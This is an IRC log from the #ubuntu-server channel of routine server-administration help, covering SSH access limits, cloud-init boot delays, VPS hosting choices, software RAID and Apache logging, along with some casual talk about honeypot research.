<arrrghhh> just wish i knew half the crap he does.  i try to learn it, but i don't use it all that often.
<intel352> having reason to use it is the only good way to learn
<arrrghhh> i'm usually not doing things on such a big scale that require scripting crap out.  especially for stuff at home...
<intel352> hehe, exactly
<arrrghhh> yea... no better motivation than necessity.
<arrrghhh> i just need to buy a buch of o'reilly books haha
<arrrghhh> get a kindle or freakin get them on my phone so i can just read!
<intel352> and then find the time to read :-D
<arrrghhh> those books always have the most messed up covers.
<intel352> then find a way to apply it
<arrrghhh> haha seriously.
<twb> !support
<ubottu> The official ubuntu support channel is #ubuntu. Also see http://ubuntu.com/support and http://ubuntuforums.org
<twb> !eol
<ubottu> End-Of-Life is the time when security updates and support for an Ubuntu release stop, see https://wiki.ubuntu.com/Releases for more information. Looking to upgrade from an EOL release? See https://help.ubuntu.com/community/EOLUpgrades
<uvirtbot> New bug: #634671 in apache2 (main) "package apache2.2-common 2.2.14-5ubuntu8 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/634671
<MTecknology> !info nginx
<ubottu> nginx (source: nginx): small, but very powerful and efficient web server and mail proxy. In component universe, is optional. Version 0.7.65-1ubuntu2 (lucid), package size 327 kB, installed size 800 kB
<MTecknology> !info nginx maverick
<ubottu> nginx (source: nginx): small, but very powerful and efficient web server and mail proxy. In component universe, is optional. Version 0.7.67-3ubuntu1 (maverick), package size 332 kB, installed size 808 kB
<Sun> uff
<WalterN> st
<uvirtbot> New bug: #628328 in eucalyptus "euca_conf --register-cluster is not idempotent" [Undecided,Confirmed] https://launchpad.net/bugs/628328
<Pupeno[work]> How do I scp preserving symlinks?
<Bayles> try tar
<Bayles> tar without -h
<joschi> or rsync with --links
<eferro> is there a "elegant" solution to use iproute2 (instead of network/interfaces, ifconfig, etc) for ubuntu-server network config?
<joschi> eferro: you can use `ip` on the up, down, preup, postdown etc. hooks in /etc/network/interfaces
<joschi> eferro: http://manpages.ubuntu.com/manpages/lucid/en/man5/interfaces.5.html#toptoc2
<eferro> joschi, yes, but can I put the IP address only at the hooks???
<joschi> eferro:  hm, you could try it
<joschi> eferro: what do you want to achieve anyway?
<eferro> joschi, As far as I know (all my tests fails) It is not possible to avoid to put the IP addresss....
<eferro> joschi, because we develop some kind of appliances and have a cisco like CLI, and the commands are more similar to ip route2 commands, so If there is an "elegant" way to do integrate this I avoid to develop all the code to parse/change the network/interfaces ....
<tdn> I have a web server at my home network behind NAT. When I download something from the webserver from inside the local network, I cannot download more than my internet upstream. So it seems that traffic is routed out of my local network, to my ISP and back again. How do I fix this? I assume this happens, because domain names resolve to my server's public IP instead of the local IP. But shouldn't there be some way to configure NAT to handle this?
<uvirtbot> New bug: #634815 in samba (main) "package samba-common 2:3.4.7~dfsg-1ubuntu3.1 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/634815
<uvirtbot> New bug: #634839 in postfix (main) "package postfix 2.7.0-1 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/634839
<Error404NotFound> how can i list activated plugins for php?
<twb> Error404NotFound: execute a page that calls phpinfo()?
<twb> http://www.php.net/manual/en/function.get-loaded-extensions.php
<Error404NotFound> twb, hmmm, ok, i was more sort of looking for a commandline method
<twb> You can execute PHP from the command line
<twb> echo '<?php phpinfo() ?>' | ssh fs php-cgi
<twb> Gods, I got a lot of information out of that considering I don't have root on that host...
<eferro> the event of  network card cable unplugged or plugged seems to be detected by ifup/ifdown... so, have any sense to continue using ifplugd at Lucid server???
<twb> eferro: I don't believe you
<twb> eferro: add a line like "post-up date -Iseconds >/tmp/stamp", then see if "stamp" changes as you un/plug the cable
<twb> (Unless you're running NM or something, in which case all bets are off.)
<eferro> twb, I test this yesterday and it seems to work... I'll retest... (I think I have ifplugd stoped, but maybe I have some trouble with the test)... I will retest
<twb> See, I basically have that problem with a USB wifi device that keeps resetting itself
<twb> My lucid system is too retarded to "ifdown wlan0; ifup wlan0" each time
<twb> ifdown --allow=hotplug, that is.  You know, the thing that /lib/udev/net.agent is supposed to do
<uvirtbot> New bug: #634861 in qemu-kvm (main) "USB not working, because usbfs is removed from kernel" [Undecided,New] https://launchpad.net/bugs/634861
<fabianhoward> hi, what is the name of the program that can output keyboard commands to multiple shells, at the same time please?
<uvirtbot> New bug: #634905 in tftp-hpa (main) "/etc/init.d/tftpd-hpa lacks quotes after OPTIONS=" [Undecided,New] https://launchpad.net/bugs/634905
<MTecknology> I'm getting a crap ton of these messages.. Any ideas what's up?  Sep  9 09:19:17 repono kernel: [1968114.370179] type=1503 audit(1284041957.919:16436):  operation="rename_src" pid=7863 parent=939 profile="/usr/sbin/smbd" requested_mask="r::" denied_mask="r::" fsuid=0 ouid=0 name="/var/log/samba/log.adam-pc"
<MTecknology> the denied part makes me think this is why a user is fighting the samba shares..
<reggi> hello is anyone on here?
<Neoteric> anyone do ec2 ebs backed instances that *don't* have a load that jumps to 10.00?
<reggi> I don't know what you're talking about Neoteric
<reggi> Neoteric, I don't think anyone else is online
<Neoteric> reggi: when i spin up any of the mekrat or lucid ami's and then install say postgres the load immediately jumps to something pretty high
<Neoteric> and then stays there for ever
<reggi> does it effect the other running services Neoteric ?
<Neoteric> err... this is all on amazon ec2
<Neoteric> reggi: yes, badly
<reggi> oh I've never used amazon
<Neoteric> there's an open bug about this
<Neoteric> reggi: so i was hoping to jump in here and hope that someone else had figured out a good work around for this bug
<Neoteric> otherwise i have to create an ami w/ a karmic kernel running lucid userspace
<reggi> Neoteric, yeah usually there is at least 1 or 2 folks experienced enough to help
<reggi> but it looks like they've all gone to the pub!
<Neoteric> beer!
<Neoteric> I want beer
<reggi> i have beer!
<reggi> hey Neoteric do you know much about bind?
<Neoteric> reggi: https://bugs.launchpad.net/ubuntu-on-ec2/+bug/574910
<uvirtbot> Launchpad bug 574910 in linux-ec2 "High load averages on Lucid while idling" [Undecided,In progress]
<Neoteric> reggi: enough to know i hate using bind and have instead started to use unbound or powerdns
<Neoteric> powerdns sorta is overkill unbound is better
<reggi> unbound you say...
<reggi> i might have to check it out
<Neoteric> reggi: it's like the nginx of dns servers
<reggi> oh i don't know nginx
<zul> Daviey, ping
<reggi> i'm a noob to linux
<reggi> but i'm just trying to share my 3G internet connection to my network
<reggi> i've configured DHCP using dhcp3
<Neoteric> oh you just want a baby dns server
<reggi> now all I need to setup is a dns server so my other machines on the network will automatically get the dns
<reggi> ya
<Neoteric> uh use pfsense
<reggi> pfsense you say
<reggi> wait isnt that like a firewall?
<Neoteric> it has everything you want and you can stop putting the peices togetehr individually
<reggi> hmm i will check it out then.
<reggi> wait
<reggi> isn't pfsense based on bsd?
<Neoteric> so?
<Neoteric> gets job done
<reggi> it can be installed on ubuntu?
<Neoteric> otherwise you just want to do a simple dns forwarder
<Neoteric> and that's litterally one line in bind9
<reggi> ahah!
<reggi> yep
<reggi> i think that is what I'm after then.
<reggi> you know what would I google to get the 'how to'?
<Neoteric> http://www.ubuntugeek.com/dns-server-setup-using-bind-in-ubuntu.html
<Neoteric> pay attention to the line that says forwarders { 4.2.2.2; 4.2.2.1; 8.8.1.1; }
<reggi> tnx loolking
<Neoteric> or some such
<lool> not yet king
<ScottK> Neoteric: Please have a look at the Ubuntu server guide (see /topic) and see if it provides sufficient advice for this case.  We'd be interested in knowing what's missing from the maintained documentation that you recommend external sources of information instead.
<Neoteric> reggi: also i believe this is what dnsmasq was for
<Neoteric> ScottK: no there's an open bug and i'm just hoping that someone in here has fixed the issue cause all i really want is lucid userspace https://bugs.launchpad.net/ubuntu-on-ec2/+bug/574910
<uvirtbot> Launchpad bug 574910 in linux-ec2 "High load averages on Lucid while idling" [Undecided,In progress]
<ScottK> Neoteric: I was referring to the advice you just gave reggi.  I've no idea about ec2 stuff.
<Neoteric> ScottK: well reggi is no longer an issue it seems
<ScottK> Right.  Still interested in if the docs can be improved.
<reggi> test
<Neoteric> ScottK: oh that's simple "docs always can be improved"
<Neoteric> ScottK: but nope. you're right https://help.ubuntu.com/10.04/serverguide/C/dns-configuration.html has exactly what reggi needed
<ScottK> Neoteric: In the future, it'd be nice to point people at the maintained docs.
<Neoteric> ScottK: don't tell me what to do, i'm an american
<ScottK> So?
<joschi> ScottK: so Neoteric wants to ram democracy down our throats[tm]!
<ScottK> joschi: That's not helping.
<joschi> ScottK: it's not hurting either
<ScottK> Yeah.  It is.
<dragon`> hey guys, is there a way to limit ssh connections from the internet to only a single user?
<pmatulis> dragon`: sure
<pmatulis> AllowUsers parameter in sshd_config
<dragon`> pmatulis, so its 'AllowUsers dragon' in my sshd_config? like this it will only allow ssh from the user dragon and no one else?
<Neoteric> dragon`: after you restart the sshd, yes.
<dragon`> cool.. this will affect local ssh connections too?
<dragon`> i mean from the local network not the local machine
<Neoteric> dragon: this will affect all connections local or otherwise after you restart
<pmatulis> dragon`: are you asking whether connections will be dropped?
<tdn> I have a web server at my home network behind NAT. When I download something from the webserver from inside the local network, I cannot download more than my internet upstream. So it seems that traffic is routed out of my local network, to my ISP and back again. How do I fix this? I assume this happens, because domain names resolve to my server's public IP instead of the local IP. But shouldn't there be some way to configure NAT to handle this?
<dragon`> Neoteric, pmatulis, no, im asking if it will affect all connections after sshd restart and Neoteric answered that.. but hmm isnt there a way to allow any user to login localy? and use that with connections from outside the local network
<dragon`> what i want is to allow only 1 user to ssh to ubuntu from outside the network, im still reading the man on sshd_config to find out if its possible and how
<pmatulis> the above doesn't make sense to me
<Notscape> Hi, is there a special channel on server clustering, ha, lvs ?
<patdk-wk> #linux-ha
<Bayles> hmmm
<Notscape> hi Bayles . . me again :p
<Notscape> patdk-wk: thanks but that channels seems to be only for heartbeat . . my question points more to lvs than to ha
<SpamapS> hmm.. should Ubuntu-Server subscribe to bugs for lvm2? Its getting no triage these days.. seems rather fundamental to servers.
<zul> SpamapS: no thats foundations
<patdk-wk> Notscape, according to the lvs website, #linux-ha is the channel
<SpamapS> zul: seems like foundations needs some triage help.
<zul> SpamapS: i bet they would love it
<SpamapS> whoa.. server team has 18 untriaged... we need help too
 * SpamapS gets a-triagin
<zul> SpamapS: wha?
<smoser> mathiaz, your puppet should be fixed in maverick images now, right ?
<mathiaz> smoser: absolutely!
<smoser> cool.
<mathiaz> smoser: works like a charm!!! :)
<smoser> i'm glad you caught that and sorry i didn't test it.
<uvirtbot> New bug: #635147 in mysql-5.1 (main) "mysqld crashed with SIGSEGV" [Undecided,New] https://launchpad.net/bugs/635147
<SpamapS> smoser: you ever install cloud-init on a regular server?
<smoser> generally no.
<smoser> now is where you tell me it deleted your dat
<smoser> a
<smoser> or that you cant boot
<SpamapS> I did on accident, then rebooted.. now I'm spinning forever on a DataSourceEc2 error
<SpamapS> shouldn't it give up at some point?
<smoser> it wont be forever.
<SpamapS> couple days maybe?
<SpamapS> been going for a few minutes now.. :-P
<SpamapS> trying to boot in recovery mode... :-P
<smoser> wait considerably longer (1050 seconds) for metadata service to come up
<smoser> thats 1050 seconds + connection timeout
<SpamapS> ugh thats 15+ minutes ;)
<smoser> yes. i had made it shorter at some point.
<smoser> and the eucalyptus folks cried foul
<smoser> it was like 30 seconds, but there were times when it would time out before the MD would come up
<SpamapS> I guess there's no way to detect, on install, that you're installing cloud-init on a non VM..
<SpamapS> why doesn't eucalyptus make sure the metadata service is up before they spawn vms?
<smoser> i dont know. you'd think so.
<smoser> we used to see similar issues on ec2
<smoser> but they've seemingly fixed things
<smoser> so, yeah, the issue is that there is no way to determine "am I on ec2" easily
<smoser> i guess i could put a dpkg config option
<smoser> hm..
 * SpamapS fires up a maverick micro instance and forgets about his local server vm
<smoser> and ask you "Hi, do you want to wait 20 minutes every boot?"
<SpamapS> what about.. 300 seconds?
<smoser> i should do that. you want to open a bug ?
<smoser> i know its hard to believe
<smoser> but seriously, there are times when the MD woudl appear after like 10 minutes
<SpamapS> right, I think I'd rather have all my VM's fail to boot in that span.. but thats just me
<SpamapS> Most people don't install cloud-init right, its just on VMs or not.
<SpamapS> so not sure if debconf is the answer here
<tydeas_> Hello ppl. I am lloking for a control panel for users of my server. I tried to install ispcp but failed now i have to remove it. Does anyone has something GOOD to suggest.
<tydeas_> ?
<smoser> SpamapS, in /etc/cloud/cloud.cfg, set
<SpamapS> actually a debconf alert that warns you about the 20 minute timeout would be good.
<smoser> cloud_type: nocloud
<SpamapS> smoser: I'm just trying to boot into recovery mode at this point
<SpamapS> actually thinking of just downloading a maverick mini iso and starting over
<SpamapS> faster than waiting for this
<smoser> SpamapS, why would debconf not be the way ?
<smoser> and, if you have a vm, just mount the disk loopback (kpartx) and fix
<SpamapS> smoser: vmware. ;)
<tydeas_> anyone?
<SpamapS> I'm still a lame-o with my macbook running mac. ;)
<smoser> oh, yeah, the solution, SpamapS is to install linux on your macbook.
<smoser> i know a good distribution if you want a suggestion
<SpamapS> pfft ;)
<smoser> SpamapS, if you are feeling nice, you could open a bug for me on this.
<smoser> regarding "rather see it fail" then wait, that may be the case if you're watching something.  but if something kicks off an instance to do some work in the middle of the night with no one watching, you generally would rather have the result, then have failed because something didn't wait longer
<smoser> at least thats how i would feel.
<SpamapS> Nah, I'd really still rather it fail and alert my operations team.
<SpamapS> Even better, I'd rather use a job management solution that keeps trying until it succeeds. :)
<SpamapS> cron just sucks horribly for job management, most people use it for just that though. :(
<SpamapS> smoser: bug 635188 for your enjoyment :)
<uvirtbot> Launchpad bug 635188 in cloud-init "installing cloud-init on a non-ec2/UEC server results in a 20 minute boot wait" [Undecided,New] https://launchpad.net/bugs/635188
<smoser> meh. my feeling is that slow is better than broken, and if noone notices that something is slow and complains about it, then no one cared that it was slow.
<smoser> thanks for the bug.
<SpamapS> slow *is* broken
<SpamapS> I do agree, it shouldn't "fail", I just think that low level systems like cloud-init *should* fail, causing high level systems to recover.
 * SpamapS no longer cares, because the recovery menu has finally appeared
<SpamapS> smoser: worst part of it is that the screen is *totally* blank
<SpamapS> I was like "crap did I corrupt my disk or something?"
<smoser> well, thats a bug in upstart/general server boot.
<smoser> it *does* write messages to /dev/console
<SpamapS> yeah, I think we need to have another conversation about that at UDS
<smoser> if they're not getting there, its not really my fault :)
<SpamapS> if there's a magic key combo that reveals /dev/console's output, that would be ideal
<smoser> you may have it on alt-f7 or something
<smoser> i recal that it is somewhere.
<smoser> maybe if you ask steve jobs he'll tell you the key combination to vmware that will send 'alt-f7' to your vm
<smoser> ;-)
<SpamapS> Steve's not real happy that I'm using another server OS :)
<SpamapS> He'd prefer if I'd just buy a brick of mini's I'm sure.
<WalterN> a brick
<WalterN> lol
<uvirtbot> New bug: #635235 in samba (main) "package samba 2:3.5.4~dfsg-1ubuntu3 failed to install/upgrade: subprocess new post-removal script returned error exit status 139" [Undecided,New] https://launchpad.net/bugs/635235
<Ricardo> alguem aqui ja trabalhou com um servidor de banda usando  squid shaper (CBQ) e o Iptables?
<EvilPhoenix> !en
<ubottu> The #ubuntu, #kubuntu and #xubuntu channels are English only. For a complete list of channels in other languages, please visit http://help.ubuntu.com/community/InternetRelayChat
<EvilPhoenix> Ricardo, ^
<Ricardo> Oi Evil
<Ricardo> vc pode me ajudar com umas duvidas?
<Pici> !br | Ricardo
<ubottu> Ricardo: Entre em #ubuntu-br usando /join #ubuntu-br para ajuda em portuguÃªs. Obrigado.
<Ricardo> Ja fui la me mandarem vi praca
<Andre_Gondim> Ricardo, here you need to write in english
<EvilPhoenix> !en | Ricardo
<ubottu> Ricardo: The #ubuntu, #kubuntu and #xubuntu channels are English only. For a complete list of channels in other languages, please visit http://help.ubuntu.com/community/InternetRelayChat
<Andre_Gondim> He wants to know if anyone works with ubuntu server band with squid shaper (CBQ) and iptables
<EvilPhoenix> ubuntu server "band"?
<EvilPhoenix> >.>
<Andre_Gondim> I think is it what he said...
<Ricardo> I am not Ingles
<Ricardo> Xauuu Pra todos
<Ricardo> I do not speak English
<wickedSA> bandwidth, perhaps
<uvirtbot> New bug: #635313 in bacula (main) "package bacula-director-mysql 5.0.1-1ubuntu1 failed to install/upgrade:" [Undecided,New] https://launchpad.net/bugs/635313
<srainsdon> hello all, I have a problem with my server and would like to stop virtual box from starting on boot how would i go about this? thank you
<ruben23> hi how to check installed package in my ubuntu server
<jpds> ruben23: dpkg -l
<bobobob> moin
<bobobob> i am trying to install ubuntu server on machine with raid 1 setup.  it goes all the way through even sets up grub or so it seems, ejects disk but never boots :(
<bobobob> server 10.4 lts
<bobobob> raid 1 is setup via bios
<bobobob> anyone else ever run across this?  Install worked fine on same machine without RAID 1 setup :(
<srainsdon> what files would i need to edit to stop a start up script from running 10.04
<SpamapS> bobobob: via bios.. its probably a fakeraid?
<SpamapS> bobobob: I'd suggest letting Ubuntu do the RAID w/ software
<SpamapS> srainsdon: update-rc.d is probably the tool you want
<srainsdon> thank you
<bobobob> SpamapS: not sure, it a gigabyte GA-EP45-UD3P
<SpamapS> bobobob: for RAID1 .. unless you want to share the disk with some other OS somehow.. probably simpler to just setup software RAID and have the motherboard show it as two disks.
<bobobob> SpamapS: last night, before setting raid at bios, I don't remember seeing a option for software RAID 1, did i just miss it?
<SpamapS> bobobob: its in the installer, use manual partitioning
<bobobob> okay...thanks
<patapouf> Hi All,
<patapouf> I'm looking further into Amazon EC2 service which provide cloud computing. I'm sure everyone know the service. Is someone may help trough the process of creating a new instance.
#ubuntu-server 2010-09-11
<SpamapS> patapouf: sure
<SpamapS> patapouf: http://uec-images.ubuntu.com/releases/10.04/release/  that may help :)
<SpamapS> patapouf: https://help.ubuntu.com/community/EC2StartersGuide  and that
<nxt_user> hello
<patapouf> SpamapS, Thanks for the link...
<patapouf> SpamapS, I then select the Ubuntu 8.10 LTS 32 bits AMI .. I'm done creating the instance (I think)
<patapouf> What is the step to access it ?
<Undeon> Hey guys... Anyone here knows an howto to make an Active Directory user login automatically into squid?
<Undeon> I've already read a few howtos here, but i'm struck...=\
<patapouf> Hi, Anybody is well aware of the pricing chart of Amazone EC2 service ??
<patapouf> I need a server running 24/7 which will not be heavyly used (very low traffic). Any suggestion ? What do I need to buy ?
<wido> a vps somewhere?
<patapouf> wido, are you asking me ?
<wido> jep
<wido> a virtual private server
<patapouf> I don't have a virtual private server
<wido> no, but you could rent one somewhere
<wido> a few dollars a month
<patapouf> wido, I don't understand the need if it's provided by Amazon ...
<wido> or if if you wanted to be on decent hardware on a decent network some more
<wido> you just said that you need a server with low traffic running 24/7
<wido> so i suggest a vps
<wido> but take amazon if you please
<patapouf> I understand, but I don't know any
<RoyK> patapouf: a vps is what is provided by amazon et al
<patapouf> And amazon seas to satisfy me need so far. If you have any other suggestion/name. I will sure consider it before making my choice
 * RoyK sticks to his dedicated server
<wido> patapouf: what do you want to run on it? who are your users? where are your users? what is your problem with one minute downtime? and with one hour? and with one day?
<wido>  do you need support? in english?
<wido> etc, etc
<patapouf> wido, I want to host various application and service (apache, tomcat, ssh, rsync, etc.), I really need root access. There will be various user. Very low traffic. I have issues if the service is down for a day or more.
<patapouf> I don't need any support
<wido> and your user base is located in?
<patapouf> In fact, I need this kind of service because I want to get ride of the server I have at my office. The Internet is not reliable nor is the electricity.
<patapouf> The user are base in North-America
<wido> so, pick a hoster in a real datacentre
<patapouf> do you have names ?
<wido> with good connections near your users
<wido> with a sla that pleases you
<wido> and one that responds on e-mail
<wido> no, i'm not from the us/canada
<wido> so i can't give any advice
<wido> but make sure you understand your needs
<wido> sla, uptime, support, location, network, redundancy, etc.
<qman__> patapouf, amazon ec2 doesn't seem the right fit for your needs, just a rough calculation on the pricing, you're looking at over $60 a month
<qman__> you can get your own VPS at linode for $20 a month
<patapouf> looking at the princing chart.. it's only 300/year$ for Small instance and 57$/year for micro instance
<qman__> ec2 is CPU-usage based pricing, which is a lot for a 24/7 service
<qman__> the pricing is better suited to things that aren't 24/7
<qman__> servers on demand, that sort of thing
<patapouf> I see .. so the princing is 300$/year + 0.03$/hours .... 300$ + 0.03$*24*365 = 562$
<qman__> no, it's $300 a year OR .03/hour
<qman__> but I don't think you can run what you want to run on a micro instance
<qman__> you'd have to verify though
<qman__> err, nevermind, you're right
<qman__> reading the wrong numbers
<qman__> anyway, it'd work but it'd be quite expensive for what you're trying to do
<qman__> a regular VPS is more suited
<wido> indeed
<qman__> linode is one of the slightly more expensive ones, regarded as high quality from what I've heard
<patapouf> qman__ do you know any in North-America
<qman__> http://www.linode.com/
<qman__> probably overkill for you, but still cheaper than ec2
<wido> i don't see any info on their network though
<giovani> definitely plenty of cheap VPS vendors out there
<giovani> wido: what kind of network do you want/need?
<wido> i didn't ask :
<wido> :)
<wido> it was patapouf
<patapouf> I'm still browsing the website.. it's look interesting.
<giovani> slicehost is another well-known one
<giovani> both are pretty pricey
<qman__> if you're willing to gamble on availability and customer service, you can find VPSes under $10 a month
<giovani> if you searc the WebHostingTalk forums VPS section
<giovani> you'll see tons of deals
<giovani> search*
<giovani> I have about 10 $5 and under/mo VPSes
<giovani> most are great
<patapouf> Well looking at the princing, I need something with more than 256Mb ram and 10GB of storage
<giovani> patapouf: well, what do you need? there are tons of companies out there
<giovani> I use PhotonVPS for my "big" box -- 20GB of storage and 512MB of RAM I think for $17
<shauno> I'd be wary of overestimating how much ram you actually need.  256-512 is plenty of a lot of things
<giovani> err, $11/mo rather
<qman__> I run quite a bit on real hardware with 256MB, low traffic
<qman__> got apache, ssh, an IRC logger, and a few others
<patapouf> Hard to say, Something with 512Mb Ram, 20GB of storage is ok but more is better; 10GB of BW should be enough
<giovani> patapouf: what are you actually needing to run?
<giovani> because I run web/mail/dns servers with 64MB of ram
<giovani> easily
<qman__> yeah
<qman__> to need 512MB, you've got to have a very heavy program load
<patapouf> WEB service of many kind : apache + mod_mono + mod_php, tomcat
<giovani> ok, tons of bloat
<patapouf> kind of
 * giovani sticks with nginx and lighty
<wido> ah, tomcat :)
<qman__> but, even so
<patapouf> I currently have a VM with : 512Mb RAM, 150GB of Storage, 2.8 Ghz Core2Duo
<qman__> you can still get a VPS with that fairly cheap
<patapouf> It's running just fine, but as I mention earlier, the internet and the electricity is not very stable here
<giovani> sounds like you want a cheap dedicated server then
<giovani> that will be cheaper than a VPS of those specs
<giovani> but theoretically less reliable as well
<qman__> I don't know about cheaper
<qman__> I couldn't find any from reputable providers for less than $100 a month last I looked
<giovani> your definition of reputable is probably different than mine
<giovani> but, you'd be hard-pressed to find a VPS from a reputable vendor with 150GB of HD and a dedicated core of a 2.8GHz C2D for less than $100/mo as well
<qman__> that's true, but I don't see any reason to need that much disk space on a web server
<giovani> yeah, I also don't see any need to run mod_mono and tomcat :)
<qman__> indeed
<patapouf> really ?? is that really hard .. cause Amazon whats providing this for ~562$/year
<qman__> not with those specs
<patapouf> 46$/month
<qman__> that's easily a "large" instance, if not bigger
<giovani> look
<giovani> PhotonVPS will do 50GB disk, and 2GB of RAM for $35/mo
<patapouf> Small Instance (Default) 1.7 GB of memory, 1 EC2 Compute Unit (1 virtual core with 1 EC2 Compute Unit), 160 GB of local instance storage, 32-bit platform
<giovani> they're by far the cheapest, reasonably reputable, big VPS vendor I've found
<patapouf> qman__ : I was looking for the small instance
<qman__> I think what you need to do is find what your minimum specs really are
<qman__> because I really doubt they're that high
<qman__> and yeah, that's a great deal
<patapouf> I need obviouly more storage than CPU
<giovani> you do?
<giovani> what are you storing?
<patapouf> currently, I have 80Gig used (mostly SVN)
<qman__> do you need root access on the same server as you need your data? because you can get shared web hosting with tons of space and bandwidth for free
<giovani> haha
<qman__> and servers with tomcat and all that jazz for about $5 a month
<giovani> now we're easily getting into the not-reputable catagory
<patapouf> I know .. but I need root access
<patapouf> There is many stuff this server's doing which required me root access
<qman__> all I'm really saying is, you need to find out exactly what your needs are, because you can save a lot of money if you do
<qman__> if it really all has to be on the same server, with all that space, a dedicated server is probably your best bet
<qman__> when I was looking, you could get C2D-class systems with 2GB RAM and 500GB hard drive space, unlimited bandwidth, for about $100 a month
 * giovani pets his $7/mo dedicated server in Toronto
<patapouf> giovani : pets ??
<giovani> patapouf: ?
<patapouf> pets his $7/mo dedicated server in Toronto
<giovani> yes
<giovani> it's my pride and joy
<patapouf> pets is the name of the provider ? do you have al ink
<giovani> you don't want it though
<giovani> it's an old box
<giovani> 80GB HD
<giovani> and no link -- they no longer offer it
<giovani> hostmds is the provider though
<qman__> they do have some good plans though
<giovani> I wouldn't recommend paying anything over $30/mo for their servers :)
<giovani> their network is pretty crappy
<patapouf> and their price is in Canadian Dollard  (which is good for me since I'm from quebec)
<qman__> ah
<giovani> I kind of collect cheap servers/vpses
<giovani> it's a strange hobby of mine
<patapouf> well then it's nice to have you here -- Thanks
<giovani> corenetworks is another cheap provider
<giovani> I have two of their $25/mo celerons
<giovani> phenomenal service
<giovani> they'll hook up an ipkvm whenever you need it for free
<giovani> with virtual media support
<wido> giovani: you collect cheap vpses?! Funny :)
<giovani> wido: yes, I mostly use them as honeypots
<giovani> for some of my security research
<wido> ah, nice
<wido> on different networks?
<giovani> oh yes, that's the point
<wido> cool!
<giovani> to find as many disparate, cheap providers worldwide
<giovani> international (outside of north america and europe) are of course the hardest to get for cheap
<giovani> but I keep my eye out for deals
<wido> disparate?
<giovani> yes ... spread out
<giovani> geographically
<wido> ah
<patapouf> giovani, where are you from ?
<giovani> patapouf: US
<wido> the research is scientific, as in we can enjoy your outcomes somtime?
<giovani> wido: I mostly share amongst other security researchers -- particularly durring outbreaks, etc -- but every once in a while there's a unique attack that I write up
<giovani> I use them to write 0day IDS rules for my employer mostly
<giovani> but it's a hobby, and not official
<wido> aha
<wido> so it's not spam or viruses?
<giovani> it's for anything
<giovani> I do spam traps, low-interaction honeypots for collecting new viruses
<giovani> and high-interaction systems to trap advanced attackers
<wido> aha
<giovani> wido: you interested in security?
<bobobob> moin
<bobobob> darn, I can't get the software RAID 1 to work... I guess my question is that once one of the disks fail, how do you replace it?  I had to make a / and swap on both disks....How do I tie in a replacements
<wido> giovani: i work for an isp, but my profession is not security
<wido> giovani: do you know http://iwatchedyourhack.org/ ?
<wido> it is funny?
<wido> ?=!
<giovani>  nope, never heard of it
<giovani> commercial or residential isp?
<wido> commercial
<wido> in the netherlands
<giovani> cool
<wido> the site might be interesting for you as a security expert
<wido> it has nothing to do with my employer
<wido> but it is funny
<giovani> I'll definitely check it out
<wido> this one was on a box of a colleague: http://iwatchedyourhack.org/node/8
<shauno> heh, that is good.  I thought it was interesting when you see the direct switch from fumbling around with a very lose grasp for the environment, to just pasting in commands.  When it got to 'Shrek' .. hah
<wido> :)
<shauno> I'm curious, are they actually root under such a scenario?
<wido> nope
<wido> it's just a service
<shauno> it really looks like all you've got to do is put # in PS1 and he wouldn't know the difference
<wido> hence the odd shell
<shauno> that is oddly interesting to watch tho.  he just tried to un-tgz a .pl.
<wido> http://code.google.com/p/kippo/
<wido> that's it
<wido> kiddies
<shauno> I may have to play with that sometime.  It could be more interesting than watching china fill my ssh log
<wido> :)
<shauno> (china rather than chinese, I've no idea if it's actually originating china or just coming via.  observation more than generalization)
<wido> me either, but chinese IP's ..., thought china is big! :)
<JasonMSP> how can I create multiuple access.logs for each site Im hosting and rotate those on a weekly basis like /var/log/auth.log  ?
<wido> JasonMSP: first question, 'CustomLog /var/log/apache2/$access.log common' in your sites-available
<wido> $access=unique per site
<JasonMSP> wido:  here is an example CustomLog /srv/www/site.com/logs/access.log combined
<wido> JasonMSP: here is an example CustomLog /var/log/apache2/mailman-access.log common
<wido> and CustomLog /var/log/apache2/foto-access.log common
<wido> and CustomLog /var/log/apache2/mail-access.log common
<wido> and CustomLog /var/log/apache2/www-access.log common
<wido> etc
<JasonMSP> im not following
<JasonMSP> each website has its own virtualhost file in the /etc/apache2/sites-enabled folder
<wido> yep
<wido> and they are generated by the sites-available
<JasonMSP> id like to each week get rename the log access.log.old and start a new one.  and then delete the old .old file if there is one (on the 2nd week)
<wido> in each sites-available file you can put an unique custom log
<wido> JasonMSP: I'm not sure about the two weeks retention
<wido> i answered your first question: unique logs
<wido> the second one i'll have to check: more rotation
<JasonMSP> each site already has a custom (unique) log.  I need to rotate them out so the file doesn't become enormus because it just keeps writing and writing to it
<mnaines> How do I install Ubuntu Server on a machine with no graphics card?
<qman__> mnaines, by installing a graphics card
<qman__> or by creating your own live CD or liveUSB with a serial terminal or sshd running by default
<qman__> installing with no video is one of those things that's possible but rarely necessary and therefore not covered in the normal installer
<mnaines> Can Ubuntu Server run and be maintained without a graphics card after it is installed?
<qman__> yes, if you install ssh
<qman__> of course, you need to make sure your BIOS will boot the system without one
<qman__> I have plenty of headless servers but none of them will boot without a graphics card installed
<mnaines> I see.  Yeah...Mine throws a BIOS error 7F or 7E if I don't have a video card
<mnaines> Basically BIOS error 7F on the board I use in the desktop means the video card is fubar
<Psi-Jack> I'm running ubuntu 10.04-server under kvm in many instances, but kvm when it's sending the reboot or shutdown signal to the guests, they never even try to start shutting down as expected. I have CentOS servers as well, and they work without fail on this issue just not Ubuntu, so eventually libvirt has to force power-off the guests during a shutdown of the system.
<Psi-Jack> Is there any resolution to this issue which is pretty big?
<Psi-Jack> Aha... nevermind... Just resolved my own answer. needed to install acpid.
<uvirtbot> New bug: #635537 in clamav (main) "package clamav-base 0.96.1+dfsg-0ubuntu0.10.04.1 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/635537
<sherr> Psi-Jack: You might also want to install something like milly-guard on the host, so when the host is rebooted/shutdown, you can safely shut down the guests. Otherwise, their power is pulled - not good.
<sherr> Who's "milly"? I meant : molly-guard!
<matrix64> hey, how do I start upstart from recovery console?
<JuJuBee> I am using NIS to handle log in for my students. However, yppasswdd is not running on the server and I cannot figure out why.
<au> pths: please fix your connection
<pmatulis> NIS is so old
<willinja> pmatulis, what is nis ?
<RoyK> lol
<RoyK> !nis
